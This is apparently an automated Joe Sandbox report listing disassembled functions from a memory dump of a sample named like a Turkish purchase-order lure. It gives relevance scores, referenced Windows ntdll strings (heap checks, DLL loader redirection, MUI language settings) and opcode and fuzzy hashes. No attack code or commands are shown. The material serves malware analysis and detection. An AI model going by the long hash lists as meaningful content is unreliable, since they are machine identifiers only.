                                                                  • Opcode ID: 05377f8257abf2708844e88b00fc810ce2ee4bb7877443d97d27f6d44baee0cf
                                                                  • Instruction ID: 28c18e63e960e0137bb25e81ae14b0af371eaba881b14ae379d39bc04e8a6604
                                                                  • Opcode Fuzzy Hash: 05377f8257abf2708844e88b00fc810ce2ee4bb7877443d97d27f6d44baee0cf
                                                                  • Instruction Fuzzy Hash: ADD1D8B28483A5AFE721DB54C840BEBB7E8AF84754F404929F98597350DB74C948CBE2
                                                                  Function 32D2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 32D2D2C3
                                                                  • @, xrefs: 32D2D313
                                                                  • @, xrefs: 32D2D0FD
                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 32D2D0CF
                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 32D2D196
                                                                  • @, xrefs: 32D2D2AF
                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 32D2D146
                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 32D2D262
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                  • API String ID: 0-1356375266
                                                                  • Opcode ID: d2264b888c5bf0ee46877ec01365100760e0c25c8a08162e9f3879f2cfb701c5
                                                                  • Instruction ID: 8745781ad466b6d567e3039cebb0639088ede96ff5c3a27f0aa002853f5d7577
                                                                  • Opcode Fuzzy Hash: d2264b888c5bf0ee46877ec01365100760e0c25c8a08162e9f3879f2cfb701c5
                                                                  • Instruction Fuzzy Hash: 74A13CB19083459FE311CF25C484B9BB7E8BF88759F40892EE99896350DB74D948CFA3
                                                                  Function 32D2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-523794902
                                                                  • Opcode ID: fa18c2c7f30cf6ed17cd55eaa66e9f5ea98051b3fe3621add2922cd776961cfe
                                                                  • Instruction ID: 7b05b56620a930528ff0a506c309499dc6e1b9311f68dda278909b0c26e54e42
                                                                  • Opcode Fuzzy Hash: fa18c2c7f30cf6ed17cd55eaa66e9f5ea98051b3fe3621add2922cd776961cfe
                                                                  • Instruction Fuzzy Hash: F342BE752083819FE305CF28C880B2AB7E5FF89748F548969F895CB391DB74D945CBA2
                                                                  Function 32D4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                  • API String ID: 0-122214566
                                                                  • Opcode ID: f4a5ac97e5070477d0961281b714f906ab57c13836087067e34ad1a4b6901dde
                                                                  • Instruction ID: 04ca45a1d1c292e250b3de9b6b340186aa8aa4335cc9ee816405b463501a2b8c
                                                                  • Opcode Fuzzy Hash: f4a5ac97e5070477d0961281b714f906ab57c13836087067e34ad1a4b6901dde
                                                                  • Instruction Fuzzy Hash: 9BC17B71E00315ABEB188F65D880BBE77A5AF66708F548069EC85EB390DFB4CD44C7A1
                                                                  Function 32D663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  • Opcode ID: aa679d999ba1fc1126993aa8d5003ef46bdae9c446c75bfdbc4b8237f132372d
                                                                  • Instruction ID: 3ee6b5a7597a1a63fbd09f0fc472351a9ecc4d7c4b985a1319f280e0f4d91894
                                                                  • Opcode Fuzzy Hash: aa679d999ba1fc1126993aa8d5003ef46bdae9c446c75bfdbc4b8237f132372d
                                                                  • Instruction Fuzzy Hash: C5917C70A05354DBFB18DF14D955FAA77A0FF41B58F904528E9117BB80DBB8A881CBE0
                                                                  Function 32D6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 32DA8170
                                                                  • LdrpInitializeProcess, xrefs: 32D6C6C4
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32DA8181, 32DA81F5
                                                                  • LdrpInitializeImportRedirection, xrefs: 32DA8177, 32DA81EB
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D6C6C3
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 32DA81E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: 96dc5c3df8e5d397b5294b5918742886a70eca913a3d0986766a9d346a6d60c4
                                                                  • Instruction ID: d6286573a82af0e5e950f1afafa9c6319306494ff2716318022c8f369dae099b
                                                                  • Opcode Fuzzy Hash: 96dc5c3df8e5d397b5294b5918742886a70eca913a3d0986766a9d346a6d60c4
                                                                  • Instruction Fuzzy Hash: A2313BB16443459FE210EF68ED55E2B77E4EF84B14F410958F885AB391EB60EC09CBB2
                                                                  Function 32D62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32DA21BF
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32DA2180
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32DA219F
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 32DA2160, 32DA219A, 32DA21BA
                                                                  • SXS: %s() passed the empty activation context, xrefs: 32DA2165
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32DA2178
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: 920a9df386ca80921e55bf7eaaa85dcc62c59f9b070dc696dd37c2b5856a87ef
                                                                  • Instruction ID: c0763854591e95bf017183287ea3d5d35bb96f40fab527382cc7b7909ee6aeee
                                                                  • Opcode Fuzzy Hash: 920a9df386ca80921e55bf7eaaa85dcc62c59f9b070dc696dd37c2b5856a87ef
                                                                  • Instruction Fuzzy Hash: B0312876E40214BBF7118A96AC58F6B7778DF94788F414099FA04AB350DB30AE00CBE1
                                                                  Function 32D40770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: 8e3fcb62651de15c064e173a3f73ba3b15495ed274a56a41863b89ed64d4b232
                                                                  • Instruction ID: 8de7d57c79c9830161741f279bfc6b1e94f2d6386c4ce48fb0af14df0cade213
                                                                  • Opcode Fuzzy Hash: 8e3fcb62651de15c064e173a3f73ba3b15495ed274a56a41863b89ed64d4b232
                                                                  • Instruction Fuzzy Hash: DFF1BD74600605DFEB08CF68D990BAAB7B5FF44304F148269E8569B391DF74E981CFA0
                                                                  Function 32D6C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 32DA82DE
                                                                  • Failed to reallocate the system dirs string !, xrefs: 32DA82D7
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32DA82E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1783798831
                                                                  • Opcode ID: 42c1a2e68b0f11ad59491c8e9cedafb9d4f824f355afd0451cf96c04103ee6a8
                                                                  • Instruction ID: b7f32931f479c24e6121690b0f6de0a29064115f3df43fb4bc9b94827a7cabea
                                                                  • Opcode Fuzzy Hash: 42c1a2e68b0f11ad59491c8e9cedafb9d4f824f355afd0451cf96c04103ee6a8
                                                                  • Instruction Fuzzy Hash: FE41F2B5542300EBDB10EB24D845F5B77E8AF44B54F91492AF949E3350EBB0E885CBA1
                                                                  Function 32DB4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32DB4888
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32DB4899
                                                                  • LdrpCheckRedirection, xrefs: 32DB488F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 3446177414-3154609507
                                                                  • Opcode ID: 90eca2053f19d33ed811c4830b88e18d4a49d7d9af728c65c2f989d926b8ee16
                                                                  • Instruction ID: 09ea8f6b3e7a13cf80653a069c0e8d51cacd580a7aa5deb28cb45289a0960138
                                                                  • Opcode Fuzzy Hash: 90eca2053f19d33ed811c4830b88e18d4a49d7d9af728c65c2f989d926b8ee16
                                                                  • Instruction Fuzzy Hash: 5F41E27AA013909FDF11CE29D970A167BE4AF49B90F020669EC9AEB711DB30DC00CBD1
                                                                  Function 32D551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • WindowsExcludedProcs, xrefs: 32D5522A
                                                                  • Kernel-MUI-Language-Allowed, xrefs: 32D5527B
                                                                  • Kernel-MUI-Number-Allowed, xrefs: 32D55247
                                                                  • Kernel-MUI-Language-SKU, xrefs: 32D5542B
                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 32D55352
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                  • API String ID: 0-258546922
                                                                  • Opcode ID: 6cc73d0ec9e8795fc499a2710ac3116ecb775816f5a54b4169d9537efaa41457
                                                                  • Instruction ID: 5c50e66853e0c1a1b6ee261f860e05fe3c2d964e328e10db09854e63180e4545
                                                                  • Opcode Fuzzy Hash: 6cc73d0ec9e8795fc499a2710ac3116ecb775816f5a54b4169d9537efaa41457
                                                                  • Instruction Fuzzy Hash: 84F12F76D11219EBDF16DFA8C940ADEBBB9FF48750F61405AE501A7310DBB49E01CBA0
                                                                  Function 32E0B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 1816f63564598c8bdab1f26dc9e36f9268548f9f785eea12d155907331c698a6
                                                                  • Instruction ID: dae54f9a8e8e31a60416b332d9c3d85b76bae4f3968514fb1f8e3bc1925940e5
                                                                  • Opcode Fuzzy Hash: 1816f63564598c8bdab1f26dc9e36f9268548f9f785eea12d155907331c698a6
                                                                  • Instruction Fuzzy Hash: 5DF11972E006118BDB08CFAAC89167DBBF5BF98308755C16DD856DB380EA74EA42CF50
                                                                  Function 32D276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                  • API String ID: 0-3061284088
                                                                  • Opcode ID: 6342308959d633318a0914313ada99780979a691f3564f9948b133a0f0e7ee93
                                                                  • Instruction ID: 4ed9d0efcce3454ad129f62cede46c6f7c803ba4d5a0ef6be5d93ea2885620e9
                                                                  • Opcode Fuzzy Hash: 6342308959d633318a0914313ada99780979a691f3564f9948b133a0f0e7ee93
                                                                  • Instruction Fuzzy Hash: 2301F7B6005390DEF32A9728E409F5277E8EB43B78F258099F0109B7A1CEE49CC8D970
                                                                  Function 32D470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                  • API String ID: 0-3178619729
                                                                  • Opcode ID: 8e8703891b16027100d990067f1b58dfdf898bb3a3acdcd17bb6dbbd63d9644e
                                                                  • Instruction ID: 3da4517c70213d8636b0f9846e76e72e671023ec5d3abb8905b5f3b63040c8fd
                                                                  • Opcode Fuzzy Hash: 8e8703891b16027100d990067f1b58dfdf898bb3a3acdcd17bb6dbbd63d9644e
                                                                  • Instruction Fuzzy Hash: 33139CB4A00755CFEB19CF68C8807A9BBB1BF49344F5481A9D889EB381DF74A945CF90
                                                                  Function 32D304E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • kLsE, xrefs: 32D30540
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32D3063D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 3446177414-2547482624
                                                                  • Opcode ID: 924d5a3c13a0cd5570fba5b7bc4fe005fad2001d28d7a18b9c0823e1aaf3be1d
                                                                  • Instruction ID: 35fad664485b35fd866d61bd419b43844f9469d861af49065b1bca5e32aa639b
                                                                  • Opcode Fuzzy Hash: 924d5a3c13a0cd5570fba5b7bc4fe005fad2001d28d7a18b9c0823e1aaf3be1d
                                                                  • Instruction Fuzzy Hash: 60519CB65067828BD316DF64E540797B7E4AF84305F00883EEAEA87340EB74D545CBA2
                                                                  Function 32D3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  • Opcode ID: 8ca820ec03458306ff6ebb832bed1818069ada8180816d164a90eec99cf076ab
                                                                  • Instruction ID: 03eb7488696333abb244e64e06d86363de2778f4fca2b3c395817492ffdbcf36
                                                                  • Opcode Fuzzy Hash: 8ca820ec03458306ff6ebb832bed1818069ada8180816d164a90eec99cf076ab
                                                                  • Instruction Fuzzy Hash: 6EC19E75209382CFD716CF18C544B9AB7E4FF84758F00496AFA998B350EB74C949CB62
                                                                  Function 32D6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 32DA22B6
                                                                  • SXS: %s() passed the empty activation context, xrefs: 32DA21DE
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32DA21D9, 32DA22B1
                                                                  • .Local, xrefs: 32D628D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: 73ab6f6884f60c7b4c0a5398d285621150dd62e554b949dee00ac47b8c1ec182
                                                                  • Instruction ID: a7fc439c51b733e84fe35ef489085cf18bf00fa74709c5539f4f4d74e5b49942
                                                                  • Opcode Fuzzy Hash: 73ab6f6884f60c7b4c0a5398d285621150dd62e554b949dee00ac47b8c1ec182
                                                                  • Instruction Fuzzy Hash: 8EA1AE75941329DBEB24CF65DC88BA9B3B1BF58358F5041EAD848AB350DB349E80CF90
                                                                  Function 32D2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                  • API String ID: 0-2586055223
                                                                  • Opcode ID: cfbaef7d8c530bbf54b5ca86448d387f64106dd5ef76aed6596ce111a9a90816
                                                                  • Instruction ID: b774ddce40114d713f2c6b009dfdb1c4f5751027248d4e009314115bbca190ab
                                                                  • Opcode Fuzzy Hash: cfbaef7d8c530bbf54b5ca86448d387f64106dd5ef76aed6596ce111a9a90816
